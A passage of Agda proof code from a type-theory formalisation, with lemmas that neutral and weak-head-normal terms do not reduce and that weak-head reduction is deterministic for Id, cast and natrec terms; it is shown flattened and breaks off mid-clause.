(Id-ℕ-00 tr) (Idₙ ()) neRedTerm (Id-ℕ-00 tr) (Idℕₙ ()) neRedTerm (Id-ℕ-00 tr) (Idℕ0ₙ ()) neRedTerm (Id-ℕ-SS x tr) (Idₙ ()) neRedTerm (Id-ℕ-SS x tr) (Idℕₙ ()) neRedTerm (Id-U-ΠΠ A B A' B') (Idₙ ()) neRedTerm (Id-U-ΠΠ A B A' B') (IdUₙ ()) neRedTerm (Id-U-ΠΠ A B A' B') (IdUΠₙ ()) neRedTerm (Id-U-ℕℕ x) (Idₙ ()) neRedTerm (Id-U-ℕℕ x) (IdUₙ ()) neRedTerm (Id-U-ℕℕ x) (IdUℕₙ ()) neRedTerm (Id-SProp A B) (Idₙ ()) neRedTerm (Id-ℕ-0S x) (Idₙ ()) neRedTerm (Id-ℕ-S0 x) (Idₙ ()) neRedTerm (Id-U-ℕΠ A B) (Idₙ ()) neRedTerm (Id-U-Πℕ A B) (Idₙ ()) neRedTerm (Id-U-ΠΠ!% eq A B A' B') (Idₙ ()) neRedTerm (cast-subst tr B e x) (castₙ tn) = neRedTerm tr tn neRedTerm (cast-ℕ-subst tr e x) (castℕₙ tn) = neRedTerm tr tn neRedTerm (cast-Π-subst A B tr e x) (castΠₙ tn) = neRedTerm tr tn neRedTerm (cast-Π-subst A B tr e x) (castΠℕₙ) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castΠₙ tn) = whnfRedTerm tr Πₙ neRedTerm (cast-subst tr x x₁ x₂) (castℕℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castℕΠₙ) = whnfRedTerm tr ℕₙ neRedTerm (cast-subst tr x x₁ x₂) (castΠℕₙ) = whnfRedTerm tr Πₙ neRedTerm (cast-ℕ-subst tr x x₁) (castℕℕₙ tn) = whnfRedTerm tr ℕₙ neRedTerm (cast-ℕ-subst tr x x₁) (castℕΠₙ) = whnfRedTerm tr Πₙ neRedTerm (cast-Π A B A' B' e f) (castₙ ()) neRedTerm (cast-Π A B A' B' e f) (castΠₙ ()) neRedTerm (cast-ℕ-0 x) (castₙ ()) neRedTerm (cast-ℕ-0 x) (castℕₙ ()) neRedTerm (cast-ℕ-0 x) (castℕℕₙ ()) neRedTerm (cast-ℕ-S x x₁) (castₙ ()) neRedTerm (cast-ℕ-S x x₁) (castℕₙ ()) neRedTerm (cast-ℕ-S x x₁) (castℕℕₙ ()) neRedTerm (cast-ℕ-cong x x₁) (castₙ ()) neRedTerm (cast-ℕ-cong x x₁) (castℕₙ ()) neRedTerm (cast-ℕ-cong x x₁) (castℕℕₙ t) = neRedTerm x₁ t neRedTerm (cast-subst d x x₁ x₂) castΠΠ%!ₙ = whnfRedTerm d Πₙ neRedTerm (cast-subst d x x₁ x₂) castΠΠ!%ₙ = whnfRedTerm d Πₙ neRedTerm (cast-Π-subst x x₁ d x₂ x₃) castΠΠ%!ₙ = whnfRedTerm d Πₙ neRedTerm (cast-Π-subst x x₁ d x₂ x₃) castΠΠ!%ₙ = whnfRedTerm d Πₙ neRed (univ x) N = neRedTerm x N whnfRedTerm (conv d x) w = whnfRedTerm d w whnfRedTerm (app-subst d x) (ne (∘ₙ x₁)) = neRedTerm d x₁ whnfRedTerm (β-red _ _ x x₁ x₂) (ne (∘ₙ ())) whnfRedTerm (natrec-subst x x₁ x₂ d) (ne (natrecₙ x₃)) = neRedTerm d x₃ whnfRedTerm (natrec-zero x x₁ x₂) (ne (natrecₙ ())) whnfRedTerm (natrec-suc x x₁ x₂ x₃) (ne (natrecₙ ())) whnfRedTerm (Id-subst d x x₁) (ne (Idₙ x₂)) = neRedTerm d x₂ whnfRedTerm (Id-subst d x x₁) (ne (Idℕₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-subst d x x₁) (ne (Idℕ0ₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-subst d x x₁) (ne (IdℕSₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-subst d x x₁) (ne (IdUₙ x₂)) = whnfRedTerm d Uₙ whnfRedTerm (Id-subst d x x₁) (ne (IdUℕₙ x₂)) = whnfRedTerm d Uₙ whnfRedTerm (Id-subst d x x₁) (ne (IdUΠₙ x₂)) = whnfRedTerm d Uₙ whnfRedTerm (Id-ℕ-subst d x) (ne (Idℕₙ x₁)) = neRedTerm d x₁ whnfRedTerm (Id-ℕ-subst d x) (ne (Idℕ0ₙ x₁)) = whnfRedTerm d zeroₙ whnfRedTerm (Id-ℕ-subst d x) (ne (IdℕSₙ x₁)) = whnfRedTerm d sucₙ whnfRedTerm (Id-ℕ-0-subst d) (ne (Idℕ0ₙ x)) = neRedTerm d x whnfRedTerm (Id-ℕ-S-subst x d) (ne (IdℕSₙ x₁)) = neRedTerm d x₁ whnfRedTerm (Id-U-subst d x) (ne (IdUₙ x₁)) = neRedTerm d x₁ whnfRedTerm (Id-U-subst d x) (ne (IdUℕₙ x₁)) = whnfRedTerm d ℕₙ whnfRedTerm (Id-U-subst d x) (ne (IdUΠₙ x₁)) = whnfRedTerm d Πₙ whnfRedTerm (Id-U-ℕ-subst d) (ne (IdUℕₙ x)) = neRedTerm d x whnfRedTerm (Id-U-Π-subst x x₁ d) (ne (IdUΠₙ x₂)) = neRedTerm d x₂ whnfRedTerm (Id-Π _ _ x x₁ x₂ x₃) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-00 x) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-00 x) (ne (Idℕₙ ())) whnfRedTerm (Id-ℕ-00 x) (ne (Idℕ0ₙ ())) whnfRedTerm (Id-ℕ-SS x x₁) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-SS x x₁) (ne (Idℕₙ ())) whnfRedTerm (Id-ℕ-SS x x₁) (ne (IdℕSₙ ())) whnfRedTerm (Id-U-ΠΠ x x₁ x₂ x₃) (ne (Idₙ ())) whnfRedTerm (Id-U-ΠΠ x x₁ x₂ x₃) (ne (IdUₙ ())) whnfRedTerm (Id-U-ΠΠ x x₁ x₂ x₃) (ne (IdUΠₙ ())) whnfRedTerm (Id-U-ℕℕ x) (ne (Idₙ ())) whnfRedTerm (Id-U-ℕℕ x) (ne (IdUₙ ())) whnfRedTerm (Id-U-ℕℕ x) (ne (IdUℕₙ ())) whnfRedTerm (Id-SProp x x₁) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-0S x) (ne (Idₙ ())) whnfRedTerm (Id-ℕ-S0 x) (ne (Idₙ ())) whnfRedTerm (Id-U-ℕΠ A B) (ne (Idₙ ())) whnfRedTerm (Id-U-Πℕ A B) (ne (Idₙ ())) whnfRedTerm (Id-U-ΠΠ!% eq A B A' B') (ne (Idₙ ())) whnfRedTerm (cast-subst d x x₁ x₂) (ne (castₙ x₃)) = neRedTerm d x₃ whnfRedTerm (cast-subst d x x₁ x₂) (ne (castℕₙ x₃)) = whnfRedTerm d ℕₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne (castΠₙ x₃)) = whnfRedTerm d Πₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne (castℕℕₙ x₃)) = whnfRedTerm d ℕₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne castℕΠₙ) = whnfRedTerm d ℕₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne castΠℕₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-ℕ-subst d x x₁) (ne (castℕₙ x₂)) = neRedTerm d x₂ whnfRedTerm (cast-ℕ-subst d x x₁) (ne (castℕℕₙ x₂)) = whnfRedTerm d ℕₙ whnfRedTerm (cast-ℕ-subst d x x₁) (ne castℕΠₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne (castΠₙ x₄)) = neRedTerm d x₄ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne castΠℕₙ) = whnfRedTerm d ℕₙ whnfRedTerm (cast-Π x x₁ x₂ x₃ x₄ x₅) (ne (castₙ ())) whnfRedTerm (cast-Π x x₁ x₂ x₃ x₄ x₅) (ne (castΠₙ ())) whnfRedTerm (cast-ℕ-0 x) (ne (castₙ ())) whnfRedTerm (cast-ℕ-0 x) (ne (castℕₙ ())) whnfRedTerm (cast-ℕ-0 x) (ne (castℕℕₙ ())) whnfRedTerm (cast-ℕ-S x x₁) (ne (castₙ ())) whnfRedTerm (cast-ℕ-S x x₁) (ne (castℕₙ ())) whnfRedTerm (cast-ℕ-S x x₁) (ne (castℕℕₙ ())) whnfRedTerm (cast-ℕ-cong x x₁) (ne (castₙ ())) whnfRedTerm (cast-ℕ-cong x x₁) (ne (castℕₙ ())) whnfRedTerm (cast-ℕ-cong x x₁) (ne (castℕℕₙ t)) = neRedTerm x₁ t whnfRedTerm (cast-subst d x x₁ x₂) (ne castΠΠ%!ₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-subst d x x₁ x₂) (ne castΠΠ!%ₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne castΠΠ%!ₙ) = whnfRedTerm d Πₙ whnfRedTerm (cast-Π-subst x x₁ d x₂ x₃) (ne castΠΠ!%ₙ) = whnfRedTerm d Πₙ whnfRed (univ x) w = whnfRedTerm x w whnfRed*Term : ∀ {Γ t u A l} (d : Γ ⊢ t ⇒* u ∷ A ^ l) (w : Whnf t) → t PE.≡ u whnfRed*Term (id x) Uₙ = PE.refl whnfRed*Term (id x) Πₙ = PE.refl whnfRed*Term (id x) ∃ₙ = PE.refl whnfRed*Term (id x) ℕₙ = PE.refl whnfRed*Term (id x) Emptyₙ = PE.refl whnfRed*Term (id x) lamₙ = PE.refl whnfRed*Term (id x) zeroₙ = PE.refl whnfRed*Term (id x) sucₙ = PE.refl whnfRed*Term (id x) (ne x₁) = PE.refl whnfRed*Term (conv x x₁ ⇨ d) w = ⊥-elim (whnfRedTerm x w) whnfRed*Term (x ⇨ d) (ne x₁) = ⊥-elim (neRedTerm x x₁) whnfRed* : ∀ {Γ A B r} (d : Γ ⊢ A ⇒* B ^ r) (w : Whnf A) → A PE.≡ B whnfRed* (id x) w = PE.refl whnfRed* (x ⇨ d) w = ⊥-elim (whnfRed x w) -- Whr is deterministic -- somehow the cases (cast-Π, cast-Π) and (Id-U-ΠΠ, Id-U-ΠΠ) fail if -- we do not introduce a dummy relevance rA'. This is why we need the two -- auxiliary functions. whrDetTerm-aux1 : ∀{Γ t u F lF A A' rA lA lB rA' l B B' e f} → (d : t PE.≡ cast l (Π A ^ rA ° lA ▹ B ° lB ° l) (Π A' ^ rA' ° lA ▹ B' ° lB ° l) e f) → (d′ : Γ ⊢ t ⇒ u ∷ F ^ lF) → (lam A' ▹ (let a = cast l (wk1 A') (wk1 A) (Idsym (Univ rA l) (wk1 A) (wk1 A') (fst (wk1 e))) (var 0) in cast l (B [ a ]↑) B' ((snd (wk1 e)) ∘ (var 0) ^ ¹) ((wk1 f) ∘ a ^ l)) ^ l) PE.≡ u whrDetTerm-aux1 d (conv d' x) = whrDetTerm-aux1 d d' whrDetTerm-aux1 PE.refl (cast-subst d' x x₁ x₂) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux1 PE.refl (cast-Π-subst x x₁ d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux1 PE.refl (cast-Π x x₁ x₂ x₃ x₄ x₅) = PE.refl whrDetTerm-aux2 : ∀{Γ t u F lF A rA B A' rA' B'} → (rA≡rA' : rA PE.≡ rA') → (d : t PE.≡ Id (U ⁰) (Π A ^ rA ° ⁰ ▹ B ° ⁰ ° ⁰) (Π A' ^ rA' ° ⁰ ▹ B' ° ⁰ ° ⁰)) → (d' : Γ ⊢ t ⇒ u ∷ F ^ lF) → (∃ (Id (Univ rA ⁰) A A') ▹ (Π (wk1 A') ^ rA ° ⁰ ▹ Id (U ⁰) ((wk (lift (step id)) B) [ cast ⁰ (wk1 (wk1 A')) (wk1 (wk1 A)) (Idsym (Univ rA ⁰) (wk1 (wk1 A)) (wk1 (wk1 A')) (var 1)) (var 0) ]↑) (wk (lift (step id)) B') ° ¹ ° ¹ ) ) PE.≡ u whrDetTerm-aux2 eq d (conv d' x) = whrDetTerm-aux2 eq d d' whrDetTerm-aux2 _ PE.refl (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm-aux2 _ PE.refl (Id-U-subst d' x) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux2 _ PE.refl (Id-U-Π-subst x x₁ d') = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm-aux2 _ PE.refl (Id-U-ΠΠ x x₁ x₂ x₃) = PE.refl whrDetTerm-aux2 PE.refl PE.refl (Id-U-ΠΠ!% eq A B A' B') = ⊥-elim (eq PE.refl) whrDetTerm : ∀{Γ t u A l u′ A′ l′} (d : Γ ⊢ t ⇒ u ∷ A ^ l) (d′ : Γ ⊢ t ⇒ u′ ∷ A′ ^ l′) → u PE.≡ u′ whrDet : ∀{Γ A B B′ r r'} (d : Γ ⊢ A ⇒ B ^ r) (d′ : Γ ⊢ A ⇒ B′ ^ r') → B PE.≡ B′ whrDetTerm (conv d x) d′ = whrDetTerm d d′ whrDetTerm (app-subst d x) (app-subst d′ x₁) rewrite whrDetTerm d d′ = PE.refl whrDetTerm (app-subst d x) (β-red _ _ x₁ x₂ x₃) = ⊥-elim (whnfRedTerm d lamₙ) whrDetTerm (β-red _ _ x x₁ x₂) (app-subst d' x₃) = ⊥-elim (whnfRedTerm d' lamₙ) whrDetTerm (β-red _ _ x x₁ x₂) (β-red _ _ x₃ x₄ x₅) = PE.refl whrDetTerm (natrec-subst x x₁ x₂ d) (natrec-subst x₃ x₄ x₅ d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (natrec-subst x x₁ x₂ d) (natrec-zero x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (natrec-subst x x₁ x₂ d) (natrec-suc x₃ x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (natrec-zero x x₁ x₂) (natrec-subst x₃ x₄ x₅ d') = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (natrec-zero x x₁ x₂) (natrec-zero x₃ x₄ x₅) = PE.refl whrDetTerm (natrec-suc x x₁ x₂ x₃) (natrec-subst x₄ x₅ x₆ d') = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (natrec-suc x x₁ x₂ x₃) (natrec-suc x₄ x₅ x₆ x₇) = PE.refl whrDetTerm (Id-subst d x x₁) (Id-subst d' x₂ x₃) rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-subst d x x₁) (Id-ℕ-subst d' x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-S-subst x₂ d') = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-Π-subst x₂ x₃ d') = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-Π _ _ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-00 x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-SS x₂ x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ΠΠ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ℕℕ x₂) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-SProp x₂ x₃) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-0S x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-ℕ-S0 x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ℕΠ x₂ x₃) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-Πℕ x₂ x₃) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-subst d x x₁) (Id-U-ΠΠ!% x₂ x₃ x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d Uₙ) whrDetTerm (Id-ℕ-subst d x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-subst d' x₁) rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-S-subst x₁ d') = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-00 x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-SS x₁ x₂) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-0S x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-subst d x) (Id-ℕ-S0 x₁) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-subst d' x) = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-0-subst d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-00 x) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-ℕ-0-subst d) (Id-ℕ-0S x) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-S-subst x₁ d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-SS x₁ x₂) = ⊥-elim (whnfRedTerm d sucₙ) whrDetTerm (Id-ℕ-S-subst x d) (Id-ℕ-S0 x₁) = ⊥-elim (whnfRedTerm d zeroₙ) whrDetTerm (Id-U-subst d x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-subst d x) (Id-U-subst d' x₁) rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-U-subst d x) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-subst d x) (Id-U-Π-subst x₁ x₂ d') = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-subst d x) (Id-U-ΠΠ x₁ x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-subst d x) (Id-U-ℕℕ x₁) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-subst d x) (Id-U-ℕΠ x₁ x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-subst d x) (Id-U-Πℕ x₁ x₂) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-subst d x) (Id-U-ΠΠ!% x₁ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-U-subst d' x) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-U-ℕ-subst d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-U-ℕ-subst d) (Id-U-ℕℕ x) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-ℕ-subst d) (Id-U-ℕΠ x x₁) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-Π-subst x₂ x₃ d') rewrite whrDetTerm d d' = PE.refl whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-ΠΠ x₂ x₃ x₄ x₅) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-Πℕ x₂ x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (Id-U-Π-subst x x₁ d) (Id-U-ΠΠ!% x₂ x₃ x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (Id-Π _ _ x x₁ x₂ x₃) (Id-subst d' x₄ x₅) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-Π _ _ x x₁ x₂ x₃) (Id-Π _ _ x₄ x₅ x₆ x₇) = PE.refl whrDetTerm (Id-ℕ-00 x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-00 x) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-00 x) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-00 x) (Id-ℕ-00 x₁) = PE.refl whrDetTerm (Id-ℕ-SS x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-SS x x₁) (Id-ℕ-subst d' x₂) = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-SS x x₁) (Id-ℕ-S-subst x₂ d') = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-SS x x₁) (Id-ℕ-SS x₂ x₃) = PE.refl whrDetTerm (Id-U-ΠΠ x x₁ x₂ x₃) d' = whrDetTerm-aux2 PE.refl PE.refl d' whrDetTerm (Id-U-ℕℕ x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ℕℕ x) (Id-U-subst d' x₁) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕℕ x) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕℕ x) (Id-U-ℕℕ x₁) = PE.refl whrDetTerm (Id-SProp x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-SProp x x₁) (Id-SProp x₂ x₃) = PE.refl whrDetTerm (Id-ℕ-0S x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-0S x) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-0S x) (Id-ℕ-0-subst d') = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-0S x) (Id-ℕ-0S x₁) = PE.refl whrDetTerm (Id-ℕ-S0 x) (Id-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-ℕ-S0 x) (Id-ℕ-subst d' x₁) = ⊥-elim (whnfRedTerm d' sucₙ) whrDetTerm (Id-ℕ-S0 x) (Id-ℕ-S-subst x₁ d') = ⊥-elim (whnfRedTerm d' zeroₙ) whrDetTerm (Id-ℕ-S0 x) (Id-ℕ-S0 x₁) = PE.refl whrDetTerm (Id-U-ℕΠ x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ℕΠ x x₁) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-ℕΠ x x₁) (Id-U-ℕ-subst d') = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-ℕΠ x x₁) (Id-U-ℕΠ x₂ x₃) = PE.refl whrDetTerm (Id-U-Πℕ x x₁) (Id-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-Πℕ x x₁) (Id-U-subst d' x₂) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-Πℕ x x₁) (Id-U-Π-subst x₂ x₃ d') = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (Id-U-Πℕ x x₁) (Id-U-Πℕ x₂ x₃) = PE.refl whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-subst d' x x₁) = ⊥-elim (whnfRedTerm d' Uₙ) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-subst d' x) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-Π-subst x x₁ d') = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-ΠΠ x x₁ x₂ x₃) = ⊥-elim (eq PE.refl) whrDetTerm (Id-U-ΠΠ!% eq A B A' B') (Id-U-ΠΠ!% x x₁ x₂ x₃ x₄) = PE.refl whrDetTerm (cast-subst d x x₁ x₂) (cast-subst d' x₃ x₄ x₅) rewrite whrDetTerm d d' = PE.refl whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-subst d' x₃ x₄) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-Π-subst x₃ x₄ d' x₅ x₆) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-Π x₃ x₄ x₅ x₆ x₇ x₈) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-0 x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-S x₃ x₄) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-subst d' x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-subst d' x₂ x₃) rewrite whrDetTerm d d' = PE.refl whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-0 x₂) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-S x₂ x₃) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-Π-subst x x₁ d x₂ x₃) (cast-subst d' x₄ x₅ x₆) = ⊥-elim (whnfRedTerm d' Πₙ) whrDetTerm (cast-Π-subst x x₁ d x₂ x₃) (cast-Π-subst x₄ x₅ d' x₆ x₇) rewrite whrDetTerm d d' = PE.refl whrDetTerm (cast-Π-subst x x₁ d x₂ x₃) (cast-Π x₄ x₅ x₆ x₇ x₈ x₉) = ⊥-elim (whnfRedTerm d Πₙ) whrDetTerm (cast-Π x x₁ x₂ x₃ x₄ x₅) d' = whrDetTerm-aux1 (PE.refl) d' whrDetTerm (cast-ℕ-0 x) (cast-subst d' x₁ x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-0 x) (cast-ℕ-subst d' x₁ x₂) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-0 x) (cast-ℕ-0 x₁) = PE.refl whrDetTerm (cast-ℕ-S x x₁) (cast-subst d' x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-S x x₁) (cast-ℕ-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-S x x₁) (cast-ℕ-S x₂ x₃) = PE.refl whrDetTerm (cast-ℕ-cong x x₁) (cast-subst d' x₂ x₃ x₄) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-cong x x₁) (cast-ℕ-subst d' x₂ x₃) = ⊥-elim (whnfRedTerm d' ℕₙ) whrDetTerm (cast-ℕ-cong x x₁) (cast-ℕ-cong x₂ x₃) rewrite whrDetTerm x₁ x₃ = PE.refl -- whrDetTerm (cast-subst d x x₁ x₂) (cast-ℕ-cong x₃ d′) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-subst d x x₁) (cast-ℕ-cong x₂ d′) = ⊥-elim (whnfRedTerm d ℕₙ) whrDetTerm (cast-ℕ-0 x) (cast-ℕ-cong x₁ d′) = ⊥-elim (whnfRedTerm d′ zeroₙ) whrDetTerm (cast-ℕ-S x x₁) (cast-ℕ-cong x₂ d′) = ⊥-elim 